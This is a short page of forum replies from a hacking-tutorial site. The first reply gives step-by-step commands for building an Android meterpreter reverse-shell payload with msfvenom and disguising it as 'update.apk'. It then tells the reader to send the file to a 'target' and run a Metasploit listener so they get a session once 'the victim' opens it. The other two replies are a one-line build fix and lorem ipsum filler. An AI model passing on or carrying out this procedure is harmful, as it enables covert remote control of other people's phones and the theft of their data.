Home Comm
Topics User
FORUM F
BLOG B

H4ck3r.me

#1 Website For Linux Tutorials

h4ck3r

Forum Replies Created

Viewing 3 posts - 1 through 3 (of 3 total)
    • 1. Find your Local IP Address Before creating the payload, you need to know your internal IP. Open a new session and type:

      ifconfig

      Look for the address under wlan0 (usually looks like 192.168.1.x).

      2. Generate the APK Use msfvenom to create the malicious file. Replace with the IP you found above.

      msfvenom -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -o /sdcard/update.apk
      This saves the file update.apk to your internal storage. Send this file to the target device and install it.

      3. Start the Listener Now you need to wait for the connection. Open Metasploit:

      msfconsole
      Then run these commands one by one:

      use exploit/multi/handler
      set payload android/meterpreter/reverse_tcp
      set LHOST <YOUR_IP>
      set LPORT 4444
      exploit

      When the victim opens the app, you will get a meterpreter session.

    • Already Fixed, You have to install java 8 to fix build error

    • Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Viewing 3 posts - 1 through 3 (of 3 total)